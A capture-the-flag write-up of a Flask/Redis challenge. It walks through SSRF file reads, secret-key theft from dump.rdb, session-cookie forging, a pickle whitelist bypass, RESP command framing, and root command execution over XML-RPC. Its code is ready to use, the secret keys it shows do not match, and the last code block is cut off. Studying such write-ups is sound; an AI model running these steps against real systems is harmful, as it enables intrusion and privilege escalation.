2026 Software System Security Competition (软件系统安全赛), East China Region

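Scored zero 😭. I spent 8 hours staring at a single challenge and got very close, but was done in by not knowing pickle well enough.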

auth

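The target runs Flask (low privilege) next to a password-protected Redis. The Python app has a deserialization vulnerability, but the serialized data has to be written in through Redis. There is also an MCP server running as root. The approach is somewhat involved and splits into two steps.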
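Writing to Redis ultimately means speaking RESP, the Redis wire protocol. Below is a minimal sketch of how an `AUTH` followed by a `SET` is framed. The helper names, the example password, and the placeholder value are my own illustration; only the `online_user:` key prefix comes from app.py. How these bytes are delivered through the SSRF is a separate problem that this sketch does not cover.

```python
def resp_command(*args: bytes) -> bytes:
    """Frame one Redis command as a RESP array of bulk strings."""
    out = b"*%d\r\n" % len(args)                    # array header: element count
    for arg in args:
        out += b"$%d\r\n%s\r\n" % (len(arg), arg)   # bulk string: byte length, then data
    return out


def build_write(password: bytes, key: bytes, value: bytes) -> bytes:
    """AUTH first (Redis is password-protected), then SET the key."""
    return resp_command(b"AUTH", password) + resp_command(b"SET", key, value)


if __name__ == "__main__":
    # Placeholder arguments for illustration only.
    print(build_write(b"example-password", b"online_user:demo", b"<pickled bytes>"))
```

Because bulk strings are length-prefixed, the value can contain arbitrary binary data (such as a pickle) without any escaping.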

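  1. Use the SSRF to read the local Redis dump file, recover Flask's secret_key, and forge a session to escalate to admin (which makes the deserialization reachable).

  2. Use the SSRF to drive Redis and write serialized data, trigger the pickle deserialization for RCE, then send an XML-RPC request to the MCP server so that the flag is read with root privileges.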
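The last hop of step 2 can be sketched with the standard library. The token, the method name `execute_command`, the `/RPC2` path, and port 54321 are taken from the MCP server source listed later in this writeup; the host `127.0.0.1` and the command `id` are assumptions for illustration, and the flag location is not stated here, so it is left out.

```python
import xmlrpc.client

# Token as it appears in the MCP server source in this writeup.
MCP_TOKEN = "mcp_secure_token_b2rglxd"


def build_rpc_body(command: str) -> bytes:
    """Marshal an execute_command call; the token must be the first parameter."""
    xml = xmlrpc.client.dumps((MCP_TOKEN, command), methodname="execute_command")
    return xml.encode("utf-8")


def build_http_request(body: bytes, host: str = "127.0.0.1", port: int = 54321) -> bytes:
    """Wrap the XML-RPC body in a raw HTTP POST (host is an assumption)."""
    head = (
        "POST /RPC2 HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode("ascii") + body


if __name__ == "__main__":
    print(build_http_request(build_rpc_body("id")).decode("utf-8"))
```

With code execution already obtained on the box, `xmlrpc.client.ServerProxy` pointed at the same URL would do the same job in fewer lines. Note that the server's `read_file` rejects any path containing `flag`, while `execute_command` has no such filter.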

Audit

app.py

from flask import Flask, request, jsonify, render_template_string, session, redirect, url_for
import redis
import pickle
import requests
import base64
import os
import io
import datetime
import urllib.request
import urllib.error
import secrets
import json

app = Flask(__name__, static_folder='static', static_url_path='/static')

def render_page(title, content, username=None, role=None, show_nav=True):
"""生成带有样式的HTML页面

Args:
title: 页面标题
content: 主要内容HTML
username: 当前用户名(可选)
role: 用户角色(可选)
show_nav: 是否显示导航(默认True)
"""
# 导航菜单
nav_menu = ''
if show_nav:
if username:
nav_menu = f'''
<nav>
<ul>
<li><a href="/home">用户中心</a></li>
<li><a href="/profile">个人属性</a></li>
'''

if role == 'admin':
nav_menu += '''
<li><a href="/admin/online-users">在线用户</a></li>
<li><a href="/admin/users">注册用户</a></li>
'''

nav_menu += f'''
<li><a href="/logout">退出登录</a></li>
</ul>
</nav>
'''
else:
nav_menu = '''
<nav>
<ul>
<li><a href="/login">登录</a></li>
<li><a href="/register">注册</a></li>
</ul>
</nav>
'''

# 用户信息显示
user_info = ''
if username:
user_info = f'<div class="user-info">欢迎, {username}! (角色: {role})</div>'

html = f'''
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>{title} - auth</title>
<link rel="stylesheet" href="/static/style.css">
<link rel="icon" href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🔒</text></svg>">
</head>
<body>
<div class="container">
<header>
<h1>{title}</h1>
{user_info}
</header>

{nav_menu}

<main>
{content}
</main>

<footer>
<p>© 2026 auth | 简约安全设计</p>
</footer>
</div>

<script src="/static/script.js"></script>
</body>
</html>
'''
return html

class User:
def __init__(self, username, password=None):
self.username = username
self.password = password
self.role = "user"
self.created_at = "2026-01-20"

def __repr__(self):
return f"User(username={self.username!r}, role={self.role!r})"


class OnlineUser:
"""在线用户类,用于保存登录状态信息"""
def __init__(self, username, role="user"):
self.username = username
self.role = role
self.login_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# 设置失效时间为登录时间后1小时
expiry = datetime.datetime.now() + datetime.timedelta(hours=1)
self.expiry_time = expiry.strftime("%Y-%m-%d %H:%M:%S")
self.ip_address = request.remote_addr if request else "unknown"

def __repr__(self):
return f"OnlineUser(username={self.username!r}, role={self.role!r}, login_time={self.login_time!r}, expiry_time={self.expiry_time!r})"


class RestrictedUnpickler(pickle.Unpickler):
    """Restricted Unpickler: only allows the OnlineUser class and "safe" builtin functions"""

    ALLOWED_CLASSES = {
        '__main__.OnlineUser': OnlineUser,
        'builtins': __builtins__
    }

    def find_class(self, module: str, name: str):
        full_name = f"{module}.{name}"

        # Allow basic types and "safe" functions from the builtins module
        if module == "builtins" and name in ["getattr", "setattr", "dict", "list", "tuple"]:
            return getattr(__builtins__, name)

        # Whitelist check
        if full_name in self.ALLOWED_CLASSES:
            return self.ALLOWED_CLASSES[full_name]

        raise pickle.UnpicklingError(f"Class '{full_name}' is not allowed")


# Redis配置
CONFIG_FILE_PATH = '/opt/app_config/redis_config.json'

# 默认配置值
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_PASSWORD = '123456'

# 尝试从配置文件读取配置
try:
if os.path.exists(CONFIG_FILE_PATH):
print(f"从配置文件读取Redis配置: {CONFIG_FILE_PATH}")
with open(CONFIG_FILE_PATH, 'r') as config_file:
config = json.load(config_file)

# 从配置文件获取配置值,如果不存在则使用默认值
REDIS_HOST = config.get('redis_host', REDIS_HOST)
REDIS_PORT = config.get('redis_port', REDIS_PORT)
REDIS_PASSWORD = config.get('redis_password', REDIS_PASSWORD)

print(f"配置文件读取成功: host={REDIS_HOST}, port={REDIS_PORT}")

try:
os.remove(CONFIG_FILE_PATH)
print(f"配置文件已删除: {CONFIG_FILE_PATH}")
except Exception as delete_error:
print(f"警告:无法删除配置文件 {CONFIG_FILE_PATH}: {delete_error}")
else:
print(f"配置文件不存在: {CONFIG_FILE_PATH},使用默认Redis配置")
except Exception as config_error:
print(f"配置文件读取失败: {config_error},使用默认Redis配置")

# 连接Redis
try:
r = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, decode_responses=False)
r.ping()
print(f"Redis连接成功: {REDIS_HOST}:{REDIS_PORT}")

# 从Redis获取或生成随机secret_key
SECRET_KEY_REDIS_KEY = 'app:secret_key'
secret_key = r.get(SECRET_KEY_REDIS_KEY)
if secret_key is None:
# 生成新的随机密钥(64个字符的十六进制字符串)
secret_key = secrets.token_hex(32)
r.set(SECRET_KEY_REDIS_KEY, secret_key)
print(f"已生成新的随机secret_key并保存到Redis: {SECRET_KEY_REDIS_KEY}")
else:
# Redis返回的是bytes,需要解码为字符串
if isinstance(secret_key, bytes):
secret_key = secret_key.decode('utf-8')
print(f"从Redis加载现有的secret_key: {SECRET_KEY_REDIS_KEY}")

# 设置Flask应用的secret_key
app.secret_key = secret_key
print(f"Flask secret_key已设置(长度: {len(secret_key)})")

except Exception as e:
print(f"Redis连接失败: {e}")
r = None


@app.route('/')
def index():
return redirect(url_for('login'))


@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')

if not username or not password:
return '用户名和密码不能为空'

# 检查用户是否存在
if r is None:
return 'Redis连接失败,无法验证用户'

# 从Redis获取用户密码哈希
stored_password = r.hget(f'user:{username}', 'password')
if stored_password is None:
return '用户不存在或密码错误'

# 简单密码验证
if stored_password.decode('utf-8') != password:
return '用户不存在或密码错误'

# 登录成功,设置session
session['username'] = username
session['logged_in'] = True

# 获取用户角色
role_data = r.hget(f'user:{username}', 'role')
role = role_data.decode('utf-8') if role_data else 'user'
session['role'] = role

online_user = OnlineUser(username, role)
serialized_user = pickle.dumps(online_user)
r.set(f'online_user:{username}', serialized_user, ex=3600) # 设置1小时过期

return redirect(url_for('home'))

login_form = '''
<div class="form-container">
<h2>用户登录</h2>
<form method="post" class="login-form">
<div class="form-group">
<label for="username">用户名</label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>
<div class="form-group">
<label for="password">密码</label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>
<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">登录</button>
</div>
</form>
<div class="text-center mt-20">
<p>还没有账号? <a href="/register" class="btn btn-secondary btn-small">注册新账户</a></p>
</div>
</div>
'''

return render_page('登录', login_form, show_nav=False)


# 用户注册
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
username = request.form.get('username', '')
password = request.form.get('password', '')
confirm_password = request.form.get('confirm_password', '')
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')

if not username or not password:
return '用户名和密码不能为空'

if password != confirm_password:
return '两次输入的密码不一致'

if r is None:
return 'Redis连接失败,无法注册用户'

# 检查用户是否已存在
if r.hexists(f'user:{username}', 'password'):
return '用户名已存在'

user_data = {
'password': password,
'role': 'user',
'created_at': '2026-01-20',
'name': name if name else username, # 如果未提供姓名,默认使用用户名
'age': age if age else '0',
'phone': phone if phone else '未填写',
'avatar': '' # 默认头像为空
}

r.hset(f'user:{username}', mapping=user_data)

success_content = f'''
<div class="message message-success">
<h3>注册成功!</h3>
<p>用户 <strong>{username}</strong> 已成功注册。</p>
<p><a href="/login" class="btn btn-success mt-10">前往登录</a></p>
</div>
'''
return render_page('注册成功', success_content, show_nav=False)

register_form = '''
<div class="form-container">
<h2>用户注册</h2>
<form method="post" class="register-form">
<div class="form-group">
<label for="username">用户名 <span class="required">*</span></label>
<input type="text" id="username" name="username" required placeholder="请输入用户名">
</div>

<div class="form-group">
<label for="password">密码 <span class="required">*</span></label>
<input type="password" id="password" name="password" required placeholder="请输入密码">
</div>

<div class="form-group">
<label for="confirm_password">确认密码 <span class="required">*</span></label>
<input type="password" id="confirm_password" name="confirm_password" required placeholder="请再次输入密码">
</div>

<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" placeholder="可选,默认为用户名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" min="0" max="150" placeholder="可选">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" placeholder="可选">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success" style="width: 100%; padding: 12px;">注册</button>
</div>
</form>

<div class="text-center mt-20">
<p>已有账号? <a href="/login" class="btn btn-secondary btn-small">返回登录</a></p>
</div>
</div>
'''

return render_page('注册', register_form, show_nav=False)


@app.route('/home')
def home():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '访客')
role = session.get('role', 'user')

admin_link = ''
if role == 'admin':
admin_link = '<li><a href="/admin/online-users">管理在线用户</a> - 查看所有在线用户信息</li>\n <li><a href="/admin/users">管理注册用户</a> - 查看所有注册用户信息</li>'

main_content = f'''
<div class="dashboard">
<div class="welcome-message">
<h2>欢迎回来,{username}!</h2>
<p class="role-badge">角色: <span class="badge">{role}</span></p>
</div>

<div class="dashboard-cards">
<div class="card">
<h3>个人信息</h3>
<p>查看和编辑您的个人资料,包括头像上传</p>
<a href="/profile" class="btn btn-success mt-10">管理个人信息</a>
</div>
'''

if role == 'admin':
main_content += '''
<div class="card">
<h3>用户管理</h3>
<p>管理系统中的用户</p>
<div class="flex flex-column gap-10 mt-10">
<a href="/admin/online-users" class="btn btn-small">在线用户</a>
<a href="/admin/users" class="btn btn-small">注册用户</a>
</div>
</div>
'''

main_content += '''
</div>

<div class="quick-actions mt-30">
<h3>快速操作</h3>
<div class="flex gap-10">
<a href="/logout" class="btn btn-danger">退出登录</a>
</div>
</div>
</div>
'''

return render_page('用户中心', main_content, username, role)


@app.route('/admin/online-users')
def admin_online_users():
if not session.get('logged_in'):
return redirect(url_for('login'))

if session.get('role') != 'admin':
return '权限不足,需要管理员权限'

if r is None:
return 'Redis连接失败'

# 获取所有在线用户键
online_keys = r.keys('online_user:*')

if not online_keys:
return '没有在线用户'

users_html = '<h1>在线用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>登录时间</th><th>失效时间</th><th>IP地址</th><th>状态</th></tr>'

for key in online_keys:
try:
serialized = r.get(key)
if serialized:
file = io.BytesIO(serialized)
unpickler = RestrictedUnpickler(file)
online_user = unpickler.load()

expiry_time = datetime.datetime.strptime(online_user.expiry_time, "%Y-%m-%d %H:%M:%S")
current_time = datetime.datetime.now()
status = '在线' if current_time < expiry_time else '已过期'

users_html += f'''
<tr>
<td>{online_user.username}</td>
<td>{online_user.role}</td>
<td>{online_user.login_time}</td>
<td>{online_user.expiry_time}</td>
<td>{online_user.ip_address}</td>
<td style="color: {'green' if status == '在线' else 'red'}">{status}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">反序列化错误: {e}</td></tr>'

users_html += '</table>'

# 获取当前用户信息用于render_page
current_username = session.get('username', '')
current_role = session.get('role', '')

users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/users" class="btn btn-secondary">查看注册用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

return render_page('在线用户管理', users_html, current_username, current_role)


@app.route('/admin/users')
def admin_users():
if not session.get('logged_in'):
return redirect(url_for('login'))

if session.get('role') != 'admin':
return '权限不足,需要管理员权限'

if r is None:
return 'Redis连接失败'

# 获取所有用户键
user_keys = r.keys('user:*')

if not user_keys:
return '没有注册用户'

users_html = '<h1>注册用户列表</h1><table border="1" style="border-collapse: collapse; width: 100%;">'
users_html += '<tr><th>用户名</th><th>角色</th><th>姓名</th><th>年龄</th><th>手机号码</th><th>创建时间</th></tr>'

for key in user_keys:
try:
user_data = r.hgetall(key)
if user_data:
user_info = {}
for field, value in user_data.items():
field_str = field.decode('utf-8') if isinstance(field, bytes) else field
value_str = value.decode('utf-8') if isinstance(value, bytes) else value
user_info[field_str] = value_str

username = key.decode('utf-8').replace('user:', '') if isinstance(key, bytes) else key.replace('user:', '')
role = user_info.get('role', 'user')
name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
created_at = user_info.get('created_at', '未知')

users_html += f'''
<tr>
<td>{username}</td>
<td>{role}</td>
<td>{name}</td>
<td>{age}</td>
<td>{phone}</td>
<td>{created_at}</td>
</tr>
'''
except Exception as e:
users_html += f'<tr><td colspan="6">获取用户信息错误: {e}</td></tr>'

users_html += '</table>'

current_username = session.get('username', '')
current_role = session.get('role', '')

users_html += '''
<div class="admin-actions mt-30">
<a href="/admin/online-users" class="btn btn-secondary">查看在线用户</a>
<a href="/home" class="btn">返回用户中心</a>
</div>
'''

return render_page('注册用户管理', users_html, current_username, current_role)


@app.route('/profile')
def profile():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

# 从Redis获取用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'

user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value

name = user_info.get('name', username)
age = user_info.get('age', '0')
phone = user_info.get('phone', '未填写')
avatar = user_info.get('avatar', '')
role = user_info.get('role', 'user')
created_at = user_info.get('created_at', '未知')

# 判断头像类型:URL或本地文件
if avatar.startswith('http://') or avatar.startswith('https://'):
avatar_src = avatar
else:
avatar_src = ''

# 构建个人资料内容
profile_content = f'''
<div class="profile-container">
<div class="profile-header">
<h2>个人资料</h2>
<p>查看和管理您的个人信息</p>
</div>

<div class="profile-content">
<div class="profile-avatar-section">
<div class="avatar-preview">
<img src="{avatar_src}" alt="用户头像" id="profile-avatar">
</div>
<div class="avatar-actions">
<a href="/profile/avatar" class="btn btn-success">更换头像</a>
</div>
</div>

<div class="profile-info-section">
<h3>基本信息</h3>
<table class="profile-info-table">
<tr>
<th>用户名</th>
<td>{username}</td>
</tr>
<tr>
<th>姓名</th>
<td>{name}</td>
</tr>
<tr>
<th>年龄</th>
<td>{age}</td>
</tr>
<tr>
<th>手机号码</th>
<td>{phone}</td>
</tr>
<tr>
<th>角色</th>
<td><span class="badge">{role}</span></td>
</tr>
<tr>
<th>注册时间</th>
<td>{created_at}</td>
</tr>
</table>

<div class="profile-actions mt-30">
<a href="/profile/edit" class="btn btn-success">编辑个人资料</a>
<a href="/home" class="btn btn-secondary">返回用户中心</a>
</div>
</div>
</div>
</div>
'''

return render_page('个人属性', profile_content, username, role)


# 编辑个人属性
@app.route('/profile/edit', methods=['GET', 'POST'])
def edit_profile():
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

if request.method == 'POST':
# 获取表单数据
name = request.form.get('name', '')
age = request.form.get('age', '')
phone = request.form.get('phone', '')

# 验证年龄是否为数字
if age and not age.isdigit():
return '年龄必须是数字'

# 获取当前用户信息
current_data = r.hgetall(f'user:{username}')
if not current_data:
return '用户信息不存在'

# 更新用户信息(保留密码和角色等字段)
updates = {}
if name:
updates['name'] = name
if age:
updates['age'] = age
if phone:
updates['phone'] = phone

# 只更新有变化的字段
if updates:
r.hset(f'user:{username}', mapping=updates)

return redirect(url_for('profile'))

# GET请求,显示编辑表单
# 获取当前用户信息
user_data = r.hgetall(f'user:{username}')
if not user_data:
return '用户信息不存在'

# 解码字节数据为字符串
user_info = {}
for key, value in user_data.items():
user_info[key.decode('utf-8') if isinstance(key, bytes) else key] = \
value.decode('utf-8') if isinstance(value, bytes) else value

# 获取当前值
current_name = user_info.get('name', username)
current_age = user_info.get('age', '0')
current_phone = user_info.get('phone', '未填写')

# 构建编辑表单
edit_form = f'''
<div class="form-container">
<h2>编辑个人资料</h2>
<p>更新您的个人信息</p>

<form method="post" class="edit-form">
<div class="form-group">
<label for="name">姓名</label>
<input type="text" id="name" name="name" value="{current_name}" placeholder="请输入您的姓名">
</div>

<div class="form-group">
<label for="age">年龄</label>
<input type="number" id="age" name="age" value="{current_age}" min="0" max="150" placeholder="请输入您的年龄">
</div>

<div class="form-group">
<label for="phone">手机号码</label>
<input type="tel" id="phone" name="phone" value="{current_phone}" placeholder="请输入您的手机号码">
</div>

<div class="form-group">
<button type="submit" class="btn btn-success">保存修改</button>
<a href="/profile" class="btn btn-secondary" style="margin-left: 15px;">取消</a>
</div>
</form>

<div class="additional-actions mt-30">
<h3>其他操作</h3>
<div class="flex gap-10">
<a href="/profile/avatar" class="btn btn-small">更换头像</a>
<a href="/profile" class="btn btn-small">返回个人资料</a>
<a href="/home" class="btn btn-small">返回用户中心</a>
</div>
</div>
</div>
'''

return render_page('编辑个人属性', edit_form, username, session.get('role', 'user'))


# 退出登录
@app.route('/logout')
def logout():
session.clear()
return redirect(url_for('login'))


# 用户头像上传
@app.route('/profile/avatar', methods=['GET', 'POST'])
def upload_avatar():
# 检查用户是否登录
if not session.get('logged_in'):
return redirect(url_for('login'))

username = session.get('username', '')
if not username or r is None:
return '无法获取用户信息'

if request.method == 'GET':
# 显示上传表单
upload_form = f'''
<div class="upload-container">
<h2>上传头像</h2>
<div class="user-info mb-20">
<p><strong>当前用户:</strong> {username}</p>
</div>

<div class="upload-options">
<div class="upload-option">
<h3>方式一:上传图片文件</h3>
<div class="upload-form-card">
<form method="post" enctype="multipart/form-data" class="upload-form">
<div class="form-group">
<label for="avatar_file">选择图片文件</label>
<input type="file" id="avatar_file" name="avatar_file" accept="image/*" class="file-input">
<p class="help-text">支持 JPG, PNG, GIF 等图片格式</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="上传文件" class="btn btn-success">上传文件</button>
</div>
</form>
</div>
</div>

<div class="upload-option">
<h3>方式二:提供图片URL</h3>
<div class="upload-form-card">
<form method="post" class="upload-form">
<div class="form-group">
<label for="avatar_url">图片URL地址</label>
<input type="text" id="avatar_url" name="avatar_url" placeholder="请输入图片URL地址" class="url-input">
<p class="help-text">请输入有效的图片URL地址</p>
</div>
<div class="form-group">
<button type="submit" name="upload_type" value="从URL下载" class="btn btn-success">从URL下载</button>
</div>
</form>
</div>
</div>
</div>

<div class="upload-note mt-30">
<div class="message">
<p><strong>注意:</strong>上传的头像将显示在您的个人资料中。</p>
</div>
</div>

<div class="upload-actions mt-30">
<a href="/profile" class="btn btn-secondary">返回个人属性</a>
</div>
</div>
'''

return render_page('上传头像', upload_form, username, session.get('role', 'user'))

# POST请求处理
upload_type = request.form.get('upload_type')

if upload_type == '上传文件':
# 处理文件上传
if 'avatar_file' not in request.files:
return '请选择要上传的文件'

file = request.files['avatar_file']
if file.filename == '':
return '请选择有效的文件'

# 检查文件类型
if file.content_type and not file.content_type.startswith('image/'):
return '只能上传图片文件'

return '功能尚未开发'

elif upload_type == '从URL下载':
url = request.form.get('avatar_url', '')
if not url:
return '请提供图片URL'

try:
# 使用urllib处理URL请求
import urllib.parse

# 解析URL获取主机和端口信息
parsed = urllib.parse.urlparse(url)
host = parsed.hostname
port = parsed.port or (80 if parsed.scheme == 'http' else 443 if parsed.scheme == 'https' else None)

# 使用urllib.request.urlopen发送请求
req = urllib.request.Request(url)

# 发送请求并获取响应
response = urllib.request.urlopen(req, timeout=10)
response_data = response.read()
content_type = response.headers.get('Content-Type', '')
status_code = response.getcode()

r.hset(f'user:{username}', 'avatar', url)
data_size = len(response_data)

base64_data = base64.b64encode(response_data).decode('utf-8')

# 创建base64图片数据URI
# 如果content_type为空或无效,使用默认的image/png
display_content_type = content_type if content_type else 'image/png'
data_uri = f'data:{display_content_type};base64,{base64_data}'

# 统一显示结果,使用img标签展示base64编码的图片数据
unified_content = f'''
<div class="message">
<h2>图片预览</h2>

<div class="image-preview-container mt-20">
<div class="image-wrapper">
<img src="{data_uri}" alt="加载图片图片" style="max-width: 100%; max-height: 500px; border: 1px solid #ddd; border-radius: 4px;">
</div>
</div>

<div class="preview-actions mt-30">
<a href="/profile" class="btn btn-success">查看个人属性</a>
<a href="/profile/avatar" class="btn btn-secondary">继续上传</a>
</div>
</div>
'''

return render_page('图片预览', unified_content, username, session.get('role', 'user'))

except Exception as e:
error_content = f'''
<div class="message message-error">
<h2>处理失败</h2>
<div class="error-details">
<p><strong>错误信息:</strong> {e}</p>
</div>
<div class="error-actions mt-20">
<a href="/profile/avatar" class="btn btn-secondary">返回上传页面</a>
</div>
</div>
'''

return render_page('处理失败', error_content, username, session.get('role', 'user'))

else:
return '无效的上传类型'



if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)
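The `RestrictedUnpickler` whitelist in app.py looks tight, but allowing `getattr` is already enough to walk from `OnlineUser` to other objects. The sketch below hand-assembles a protocol 0 pickle against a simplified stand-in unpickler (`DemoUnpickler` and the cut-down `OnlineUser` are my own, and builtins are resolved via the `builtins` module instead of `__builtins__`). It only leaks the globals dict of `OnlineUser.__init__`; it demonstrates the weakness and is not the payload from the contest.

```python
import builtins
import io
import pickle


class OnlineUser:
    """Stand-in for the application's OnlineUser class."""
    def __init__(self, username, role="user"):
        self.username = username
        self.role = role


class DemoUnpickler(pickle.Unpickler):
    """Simplified copy of the whitelist logic, for illustration only."""
    def find_class(self, module, name):
        if module == "builtins" and name in ("getattr", "setattr", "dict", "list", "tuple"):
            return getattr(builtins, name)
        if (module, name) == ("__main__", "OnlineUser"):
            return OnlineUser
        raise pickle.UnpicklingError(f"Class '{module}.{name}' is not allowed")


# Equivalent to: getattr(getattr(OnlineUser, '__init__'), '__globals__')
PAYLOAD = (
    b"cbuiltins\ngetattr\n"       # GLOBAL: push getattr (outer call)
    b"("                          # MARK for the outer argument tuple
    b"cbuiltins\ngetattr\n"       # GLOBAL: push getattr (inner call)
    b"(c__main__\nOnlineUser\n"   # MARK, then push the whitelisted class
    b"V__init__\n"                # push the string '__init__'
    b"tR"                         # TUPLE + REDUCE -> OnlineUser.__init__
    b"V__globals__\n"             # push the string '__globals__'
    b"tR"                         # TUPLE + REDUCE -> the function's globals dict
    b"."                          # STOP
)


def leak_globals() -> dict:
    """Load the payload through the restricted unpickler."""
    return DemoUnpickler(io.BytesIO(PAYLOAD)).load()


if __name__ == "__main__":
    print(sorted(leak_globals().keys()))
```

In the real app that globals dict belongs to app.py, which imports `os`, `pickle`, and friends at module level, so the whitelist does not actually confine what a pickle can reach.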

Reading file:///etc/redis/redis.conf through the SSRF gives the real Redis password, redispass123 (yes, the one hardcoded in the source is a decoy).
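The avatar endpoint does not return the fetched bytes directly: it base64-encodes them into the `src` of an `<img>` tag in the preview page. A small helper to get the file content back out of that HTML might look like this (the function name and regex are mine; the data URI layout follows the `data_uri` f-string in app.py):

```python
import base64
import re

# Matches src="data:<content type>;base64,<payload>" as built by upload_avatar().
DATA_URI_RE = re.compile(r'src="data:[^"]*?;base64,([A-Za-z0-9+/=]*)"')


def extract_fetched_bytes(html: str) -> bytes:
    """Return the raw bytes that the server fetched and embedded in the preview page."""
    match = DATA_URI_RE.search(html)
    if match is None:
        raise ValueError("no base64 data URI found in response")
    return base64.b64decode(match.group(1))


if __name__ == "__main__":
    sample = '<img src="data:text/plain;base64,aGVsbG8K" alt="x">'
    print(extract_fetched_bytes(sample))
```

The request itself is a POST to `/profile/avatar` from a logged-in session with `upload_type=从URL下载` and `avatar_url` set to the `file://` URL, as the form handling in app.py shows.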

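Register, log in, and log out many times to trigger a Redis dump (roughly, the number of Redis write operations has to exceed some threshold, and the check seems to run about once every 10 minutes). Reading file:///var/lib/redis/dump.rdb then yields the Flask secret_key in plaintext, which is enough to forge a session with admin privileges.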
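Since the key is a 64-character hex string stored under `app:secret_key`, it can be pulled out of the raw RDB bytes with a regex instead of a full RDB parser. This is a sketch that assumes the value is stored uncompressed; the few bytes between key name and value are the RDB length prefix (as far as I understand the format, `@@` is 0x40 0x40, the 14-bit encoding of length 64).

```python
import re

# Key name, up to 4 bytes of length prefix, then 64 lowercase hex characters.
SECRET_RE = re.compile(rb"app:secret_key.{0,4}?([0-9a-f]{64})", re.DOTALL)


def find_secret_key(rdb: bytes) -> str:
    """Locate Flask's secret_key inside a raw dump.rdb blob."""
    match = SECRET_RE.search(rdb)
    if match is None:
        raise ValueError("app:secret_key not found (value may be compressed)")
    return match.group(1).decode("ascii")


if __name__ == "__main__":
    # Synthetic fragment for illustration; not a real dump.
    fake = b"REDIS0009\x00\x0eapp:secret_key@@" + b"ab" * 32 + b"\xff"
    print(find_secret_key(fake))
```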

# app:secret_key@@e862df6072f59a75ee66fff76e2be0af4166ac929a805e39993061d6d18223e3

python flask_session_cookie_manager3.py encode -s '88ff640dd01faab118a11f5610a15f64285e2ca45adda81c46a1dbdedf4b2a4b' -t "{'logged_in':True,'role':'admin','username':'admin'}"
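For reference, here is what the tool does under the hood, written with only the standard library. It is a sketch that mirrors the scheme Flask's default cookie session uses via itsdangerous as I understand it (salt `cookie-session`, HMAC key derivation, SHA-1, optional zlib compression); `sign_session` is my own helper name and the key in the demo is a placeholder.

```python
import base64
import hashlib
import hmac
import json
import struct
import time
import zlib
from typing import Optional


def _b64(data: bytes) -> bytes:
    """URL-safe base64 without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def sign_session(data: dict, secret_key: str, now: Optional[int] = None) -> str:
    """Build a Flask-style signed session cookie value."""
    payload = json.dumps(data, separators=(",", ":")).encode("utf-8")
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64(compressed)      # leading dot marks a compressed payload
    else:
        body = _b64(payload)
    ts = int(time.time()) if now is None else now
    timestamp = _b64(struct.pack(">Q", ts).lstrip(b"\x00"))
    value = body + b"." + timestamp
    # Key derivation "hmac": HMAC(secret_key, salt), then sign the value with it.
    derived = hmac.new(secret_key.encode("utf-8"), b"cookie-session", hashlib.sha1).digest()
    signature = _b64(hmac.new(derived, value, hashlib.sha1).digest())
    return (value + b"." + signature).decode("ascii")


if __name__ == "__main__":
    placeholder_key = "00" * 32  # substitute the key recovered from dump.rdb
    print(sign_session({"logged_in": True, "role": "admin", "username": "admin"}, placeholder_key))
```

The three session fields are exactly the ones app.py checks: `logged_in`, `role`, and `username`.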

Enumerating file:///proc/[pid]/cmdline through the SSRF reveals the MCP server source file (the filename is randomized):
mcp_server_secure_[hash].py
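The enumeration boils down to generating one `file://` URL per PID and splitting each result on NUL bytes, which is how `/proc/<pid>/cmdline` separates arguments. A sketch of the parsing side follows; the helper names, the `mcp_server` search string, and the path in the demo are hypothetical, and the fetch through the SSRF is left out.

```python
from typing import List, Optional


def cmdline_url(pid: int) -> str:
    """URL to feed to the avatar SSRF for a given PID."""
    return f"file:///proc/{pid}/cmdline"


def parse_cmdline(raw: bytes) -> List[str]:
    """Split a raw cmdline blob into its NUL-separated arguments."""
    return [part.decode("utf-8", "replace") for part in raw.split(b"\x00") if part]


def find_script(raw: bytes, needle: str = "mcp_server") -> Optional[str]:
    """Return the first argument that mentions the needle, if any."""
    for arg in parse_cmdline(raw):
        if needle in arg:
            return arg
    return None


if __name__ == "__main__":
    # Hypothetical cmdline content; the real filename carries a random hash.
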